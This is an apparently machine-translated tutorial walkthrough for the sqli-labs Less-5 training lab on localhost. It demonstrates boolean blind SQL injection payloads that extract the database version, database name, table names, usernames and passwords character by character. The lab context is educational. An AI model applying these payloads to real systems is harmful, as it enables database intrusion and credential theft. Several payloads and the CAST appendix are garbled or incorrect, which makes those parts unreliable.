Sqli-labs-master Fifth Less-5 Double Query-single: Way One

Source: Internet
Author: User
Tags ord

Since the 34th and the first and second close are roughly the same, I will not write.


Next comes the first way to write the fifth level.



1 , target site:



Http://127.0.0.1/sqli-labs-master/Less-5/?id=1


When passing the ID of 1, the Prompt "You is in"



2 , find the injection point:   

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' return error


When the above URL is entered, an error is made. We can see the cause of the error from the arrows.



instructions to " 1 ' "brought into the database query, so Presence Injection Point


3 to view version information:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (version (), 1) =5%23

Return to normal

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (version (), 1) =4%23


return error So the database version is 5.0



4 to determine the length of the database:


Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 7%23

return error

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 8%23

Return the correct

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 9%23

return error

so the name of the database is 8 bit composition


5 , guess the database name ( start with the first guess . ):

1> Guess first 1 bit

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' A '%23

Return to normal

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' Z '%23

return error

indicates that the first person a and the Z between

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' s '%23

Return the correct

so the first place is s

1> Guess first 2 bit

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' SA '%23

Return to normal


http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' sz '%23

return error

and between

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' SE '%23

Return the correct

so the second place is e

and so on until the introduction of the first 8 bits: The last database is Security


6 , guess the database ( Security ) in the table:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and ASCII (SUBSTR ((SELECT table_name from Information_ schema.tables WHERE Table_schema = Database () limit A,1)b, 1)) >n

Description

ais from0begin the first few tables,bis for the first few characters,Nis aASCIIThe corresponding decimal number



7 , guess the user:

http://127.0.0.1/sqli-labs-master/ Less-5/?id=1 ' and Ord (Mid ( Select Ifnull (CAST (username as char), 0x20) from s. M A ,1), ,1) = %23

whichSis the database name;Mis the name of the table;Afor the first few users;Bfor the first few characters;Nto beASCIIdecimal number corresponding to the code.

8. guess the user and password:

http://127.0.0.1/sqli-labs-master/ Less-5/?id=1 '   and Ord (Mid ((select Ifnull (CAST (username as char), 0x20) from S.M order by ID limit a ,1 ", b n %23  

which S is the database name;M is the table name;A is the number of users;B is the first character; N is the decimal number corresponding to the ASCII code.

Example: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Ord (Mid ((select Ifnull (CAST (password as char), 0x20) from Security.users order by ID limit 0,1) =68%23


Appendix:


substr () for string addition and subtraction


Ord () Converts the ASCLL code value to the Word Descriptor Example: Ord (' a ') denotes the ordinal number of a in ASSCLL code, which is 97; Ord (' B ') denotes B in the ASSCLL code of the ordinal number, is 98;


Mid (): string intercept function


Syntax: Mid (string, specifies the number of intercept bits, intercept N)


Example


B6=123456789abcdef =mid (b6,1,13) result = 123456789ABCD





Ifnull (EXPR1,EXPR2)


If EXPR1 is not Null,ifnull () returns EXPR1, it returns EXPR2.



Cast () function:


Reference Blog: http://www.studyofnet.com/news/109.html


(1). The argument to the CAST () function is an expression that includes the source value and the target data type separated by the AS keyword. The following example is used to convert the text string ' 12 ' to an integral type:



SELECT CAST (' + ' as int)



(2). The return value is an integer value of 12. What happens if you try to convert a string that represents a decimal to an integer value?



SELECT CAST (' 12.5 ' as int)



(3). Neither the CAST () function nor the CONVERT () function can perform rounding or truncation operations. Since 12.5 cannot be represented by an int data type, a call to this function will produce an error:

Public number


Sqli-labs-master Fifth Less-5 Double Query-single: Way One

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.